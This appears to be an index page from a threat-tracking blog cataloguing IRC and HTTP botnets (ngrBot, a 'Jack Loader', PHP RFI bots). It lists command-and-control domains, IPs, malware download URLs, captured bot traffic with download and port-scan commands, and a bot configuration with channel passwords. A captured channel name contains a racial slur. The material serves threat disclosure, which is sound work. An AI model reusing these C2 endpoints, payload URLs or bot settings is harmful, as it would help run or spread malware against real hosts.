tretr23.com(JACK LOADER hosted in Romania Iasi Prime Telecom Srl)

Uncategorized

Another http malware spreading around Panel:http://188.247.135.32/signin.php Network Activity: Host Name IP Address tretr23.com tretr23.com 188.247.135.32 Download URLs http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=0,4527399 (tretr23.com) Outgoing connection to remote server: tretr23.com TCP port 80 Host Name IP Address ytreytre.com ytreytre.com 94.63.240.235 Download URLs http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com) Outgoing connection to remote server: ytreytre.com TCP port 80 Host Name IP Address tretr23.com tretr23.com 188.247.135.32Read more...

negro001.com(ngrBot hosted in Seychelles Ideal Solution Ltd)

Uncategorized

Resolved : [negro001.com] To [193.107.16.131] Resolved : [negro001.com] To [92.241.165.152] Remote Host Port Number 199.15.234.7 80 92.241.165.152 8782 ircd here 193.107.16.131 8782 ircd here NICK [USA|635435] USER 8770 “” “lol” :8770 JOIN #moo PONG :Threat-Expert.net NICK {iNF-00-USA-XP-COMP-7188} JOIN #hold nigger PONG Threat-Expert.net USER blaze * 0 :COMP hosting infos: http://whois.domaintools.com/193.107.16.131

www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Uncategorized

Remote Host Port Number 213.202.225.40 80 213.202.225.48 80 74.206.242.164 80 46.45.164.166 81 IRCD HERE NICK [N00_USA_XP_8072956] JOIN #c MODE [00_USA_XP_9406831] -ix USER SP2-351 * 0 :COMPUTERNAME PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads. PRIVMSG #c :scan;Read more...

java.alb-team.com(linux bots hosted in United States Ft. Lee Righthosting.com)

Uncategorized

albanian lamers hosting rfi bots for ddos var $config = array(“server”=>”java.alb-team.com”, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#bote”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”bomp”, // “trigger”=>”!say@”, “hostauth”=>”*” // * hosting infos: http://whois.domaintools.com/66.78.3.76

latincrew.biz(ngrBot hosted in Russian Federation Moscow Oao Webalta)

Uncategorized

Resolved : [latincrew.biz] To [92.241.165.124] Other domains used to control bots: xsstorm.com 87.255.51.229 latincrew.biz 92.241.165.124 gu1d3sh3n.cz.cc 178.238.36.17 92.241.165.124 1234 PASS xxx NICK NEW-[USA|00|P|01507] USER XP-5713 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|01507] -ix JOIN #!nw! test PONG 22 MOTD exe file: Download Download UPDATE: 64.202.107.109 1234 Now talking in #!nw! Topic On: [ #!nw! ] [ .g.fRead more...

xD.a7aneek.net(80-100k ngrBotnet hosted in France Paris Gandi)

Uncategorized

Same lamer with big net and still hosting with Gandi.net Resolved : [xD.a7aneek.net] To [92.243.17.156] Resolved : [xD.a7aneek.net] To [92.243.25.164] Resolved : [xD.a7aneek.net] To [92.243.0.109] Resolved : [xD.a7aneek.net] To [92.243.27.72] Resolved : [xD.a7aneek.net] To [92.243.10.12] Other domain names used to control bots: xD.0dayx.com appupdate.org xD.0days.me 92.243.10.12 5900 PASS ngrBot 92.243.0.109 5900 PASS ngrBot 92.243.27.72 5900Read more...